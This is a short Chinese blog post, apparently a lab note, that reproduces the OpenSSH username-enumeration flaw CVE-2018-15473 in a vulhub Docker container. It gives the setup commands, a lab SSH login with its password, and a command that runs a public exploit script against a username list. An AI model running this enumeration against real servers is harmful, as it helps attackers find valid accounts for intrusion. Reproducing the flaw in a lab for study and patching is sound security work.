OpenSSH 用户名枚举漏洞(CVE-2018-15473)

OpenSSH 用户名枚举漏洞(CVE-2018-15473)

OpenSSH 7.7前存在一个用户名枚举漏洞,通过该漏洞,攻击者可以判断某个用户名是否存在于目标主机中。

漏洞环境

执行如下命令,编译及启动一个运行OpenSSH 7.7p1的容器:

docker-compose build
docker-compose up -d

环境启动后,我们在客户端执行ssh -o StrictHostKeyChecking=no -o UserKnownHostsFile=/dev/null root@172.168.30.190 -p20022,输入密码vulhub,即可登录到容器中。

漏洞复现

使用CVE-2018-15473-Exploit,枚举字典中的用户名:

python3 sshUsernameEnumExploit.py --port 20022 --userList exampleInput.txt 172.168.30.190

image-20210122213722927

参考

[1] https://github.com/agentgoblin/CVE-2018-15473-Exploit/commit/93607da515ead436d64958cdc9962081e62482e0

[2] https://vulhub.org/#/environments/openssh/CVE-2018-15473/

posted @ 2021-01-22 21:46  vivovox  阅读(3464)  评论(0编辑  收藏  举报